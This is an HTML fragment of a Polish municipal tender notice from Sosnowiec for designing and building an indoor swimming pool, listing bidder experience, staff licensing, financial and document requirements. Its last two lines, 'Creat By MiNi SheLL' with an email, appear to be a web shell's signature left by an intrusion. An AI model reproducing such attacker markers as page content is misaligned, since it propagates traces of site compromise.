<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, o ile Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w formule zaprojektuj i wybuduj, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej dwie roboty budowlane, z których każda polegała na budowie, przebudowie lub remoncie krytej pływalni o powierzchni użytkowej min. 1500 m2, w której budowany, przebudowany lub wyremontowany został basen o powierzchni lustra wody min. 400 m2. Każda z tych robót obejmowała co najmniej wykonanie robót budowlanych wraz z instalacjami i urządzeniami technicznymi w zakresie wielobranżowym.
Zamawiający dopuszcza, aby jedna lub dwie z wyżej wymienionych robót budowlanych nie były wykonane w formule zaprojektuj i wybuduj (tzn. nie obejmowały opracowania dokumentacji projektowej), jednakże w takim wypadku Wykonawca zobowiązany jest wykazać dodatkowo, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał odpowiednio jedną lub dwie usługi projektowe z których każda polegała na opracowaniu dokumentacji projektowej dla budowy, przebudowy lub remontu krytej pływalni o powierzchni użytkowej min. 1500 m2 wraz z basenem o powierzchni lustra wody min. 400 m2. Każda z opracowanych dokumentacji projektowych obejmowała co najmniej wykonanie robót budowlanych wraz z instalacjami i urządzeniami technicznymi w zakresie wielobranżowym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku udziału w postępowaniu w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, o ile Wykonawca wykaże, iż dysponuje:
a) co najmniej jedną osobą posiadającą potwierdzenie przygotowania zawodowego do projektowania w specjalności architektonicznej bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
ww. osoba powinna posiadać doświadczenie zawodowe w zakresie opracowania dokumentacji projektowej w branży architektonicznej dla min. 2 krytych pływalni o powierzchni użytkowej min. 1500 m2 każda
b) co najmniej jedną osobą posiadającą potwierdzenie przygotowania zawodowego do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
ww. osoba powinna posiadać doświadczenie zawodowe w zakresie  opracowania dokumentacji projektowej w branży konstrukcyjno-budowlanej dla min. 2 basenów  o powierzchni lustra min. 400 m2 każda
c) co najmniej jedną osobą posiadającą potwierdzenie przygotowania zawodowego do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
ww. osoba powinna posiadać doświadczenie zawodowe w zakresie opracowania dokumentacji projektowej w branży instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych dla min. 2 krytych pływalni z basenem, obejmującej instalację uzdatniania wody basenowej 
d) co najmniej jedną osobą posiadającą potwierdzenie przygotowania zawodowego do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
e) co najmniej jedną osobą odpowiedzialną za kierowanie robotami budowlanymi posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
ww. osoba powinna posiadać doświadczenie zawodowe w kierowaniu robotami budowlanymi, w tym doświadczenie na stanowisku kierownika budowy co najmniej jednej, zrealizowanej inwestycji, która polegała na budowie, przebudowie lub remoncie krytej pływalni
f) co najmniej jedną osobą odpowiedzialną za kierowanie robotami budowlanymi posiadającą uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej, w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
g) co najmniej jedną osobą odpowiedzialną za kierowanie robotami budowlanymi posiadającą  uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zamawiający dopuszcza łączenie funkcji określonych w literze a) - g) powyżej, w przypadku gdy osoba posiada jednocześnie kwalifikacje do wykonywania każdej z funkcji, do pełnienia której jest zgłaszana.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, o ile Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową na dzień składania ofert w wysokości nie mniejszej niż:  10.000.000,00 zł (słownie złotych: dziesięć milionów złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>


<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz ofertą pełnomocnictwa do ich reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin rękojmi i gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sosnowca, Wydział Zamówień Publicznych, ul. Ignacego Mościckiego 14, 41-200 Sosnowiec, piętro II, pok. 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 11:00, miejsce: Urząd Miasta Sosnowca, Wydział Zamówień Publicznych, ul. Ignacego Mościckiego 14, 41-200 Sosnowiec, piętro II, pok. 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com